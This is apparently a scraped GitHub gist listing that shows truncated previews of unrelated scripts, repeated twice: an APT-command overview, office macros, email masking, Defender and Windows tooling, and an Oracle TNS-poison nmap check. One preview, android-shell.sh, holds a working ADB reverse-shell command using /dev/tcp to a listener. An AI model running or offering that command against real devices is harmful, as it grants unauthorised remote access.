Yuhisern Navaratnam yuhisern7

## iranian_apit_groups_possible_commands.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                yuhisern7
                / iranian_apit_groups_possible_commands.md
            
            
              Created Feb 11, 2020
                — forked from MSAdministrator/iranian_apit_groups_possible_commands.md
            
              
                Iranian APT Groups & Possible Commands Used By These Groups
              
          
      View iranian_apit_groups_possible_commands.md
  
    
    Overview
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:

APT33
APT34
APT39
Charming Kitten


## StraightQuotes2CurlyQuotes.bas
sub StraightQuotes2CurlyQuotes
' Kudos to David for main code: https://gist.github.com/dajare/3924560
' Kudos to Villeroy for simpler, better find patterns:
'	https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
' Kudos to Kaloian Droganov for how to make the macro atomic:
'	http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
rem ----------------------------------------------------------------------
dim document	as object
dim dispatcher	as object
dim undo		as object

## a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------

## example_script_analysis_office.ps1
param(
    [string]$baseDir = "C:\SomeFolderToStoreTheData\",
    [string]$bw_client =  "000",
    [string]$bw_user = "YOURUSERNAME",
    [string]$bw_password = "YOURPASSWORD",
    [string]$filePath = "Path to Analysis Office Excel.xlsx",
    [string]$year_column = "Analysis Technical Name of Year column"
)
# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/

## android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"

## email-masking.js
/* Not sure if this has any effect against email scraping bots but it's an idea.
   It just outputs the string as an array of character codes, then restores it
   real characters after the page loads. With javascript disabled we fail. :( */

// PHP function ///////////////////////////////////
function mask($str) {
  $mask = "";
  for($c=0;$c<strlen($str);$c++) {
    $mask .= "" . ord($str[$c]) . ",";
  }

## emailmask.js
/*
	Create a Mask in an email address
	This function create a mask using a valid email address.
	This is usefull when someone need to confirm the email used in a system
	Author: Gabriel Froes - https://gist.github.com/gabrielfroes
 */
function emailMask(email) {
	var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
	var previous	= "";
	for(i=0;i<maskedEmail.length;i++){

## ExpandDefenderSig.ps1
filter Expand-DefenderAVSignatureDB {
<#
.SYNOPSIS

Decompresses a Windows Defender AV signature database (.VDM file).

.DESCRIPTION

Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.

## Windows10Reloaded.ps1
##########
# Win10 Initial Setup Script
# Author: Disassembler, Gr1d:, TheRoc
# Edited by Gr1D:
# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/
# TheROC's E.T. Disable script: https://gist.github.com/thoroc/86d354d029dda303598a

# THIS IS VERSION 5.5, error suppression is turned on. PLEASE be patient and PLEASE restart after running the script.
# This script leaves more MS defaults on, including MSE and smart-screen,
# but blocks a ton of domains and disables remote assistance secures java, sets up ipsec..

## oracle-tns-poison.nse
local bin = require "bin"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"

description = [[
Simple module to test Oracle DB server for TNS Poison vulnerability.
Module sends to server a packet with command to register new TNS Listener and check response
	sub StraightQuotes2CurlyQuotes
	' Kudos to David for main code: https://gist.github.com/dajare/3924560
	' Kudos to Villeroy for simpler, better find patterns:
	' https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
	' Kudos to Kaloian Droganov for how to make the macro atomic:
	' http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
	rem ----------------------------------------------------------------------
	dim document as object
	dim dispatcher as object
	dim undo as object
	olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisWorkbook.cls
	in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	(empty macro)
	-------------------------------------------------------------------------------
	param(
	[string]$baseDir = "C:\SomeFolderToStoreTheData\",
	[string]$bw_client = "000",
	[string]$bw_user = "YOURUSERNAME",
	[string]$bw_password = "YOURPASSWORD",
	[string]$filePath = "Path to Analysis Office Excel.xlsx",
	[string]$year_column = "Analysis Technical Name of Year column"
	)
	# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/
	#!/bin/bash
	# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
	# By Random_Robbie
	adb connect $1:5555
	adb shell sh -i >& /dev/tcp/$2/4444 0>&1
	echo "[] Should have a shell now ..... Be nice :) []"
	/* Not sure if this has any effect against email scraping bots but it's an idea.
	It just outputs the string as an array of character codes, then restores it
	real characters after the page loads. With javascript disabled we fail. :( */

	// PHP function ///////////////////////////////////
	function mask($str) {
	$mask = "";
	for($c=0;$c<strlen($str);$c++) {
	$mask .= "" . ord($str[$c]) . ",";
	}
	/*
	Create a Mask in an email address
	This function create a mask using a valid email address.
	This is usefull when someone need to confirm the email used in a system
	Author: Gabriel Froes - https://gist.github.com/gabrielfroes
	*/
	function emailMask(email) {
	var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
	var previous = "";
	for(i=0;i<maskedEmail.length;i++){
	filter Expand-DefenderAVSignatureDB {
	<#
	.SYNOPSIS

	Decompresses a Windows Defender AV signature database (.VDM file).

	.DESCRIPTION

	Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.
	##########
	# Win10 Initial Setup Script
	# Author: Disassembler, Gr1d:, TheRoc
	# Edited by Gr1D:
	# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/
	# TheROC's E.T. Disable script: https://gist.github.com/thoroc/86d354d029dda303598a

	# THIS IS VERSION 5.5, error suppression is turned on. PLEASE be patient and PLEASE restart after running the script.
	# This script leaves more MS defaults on, including MSE and smart-screen,
	# but blocks a ton of domains and disables remote assistance secures java, sets up ipsec..
	local bin = require "bin"
	local io = require "io"
	local nmap = require "nmap"
	local shortport = require "shortport"
	local stdnse = require "stdnse"
	local table = require "table"

	description = [[
	Simple module to test Oracle DB server for TNS Poison vulnerability.
	Module sends to server a packet with command to register new TNS Listener and check response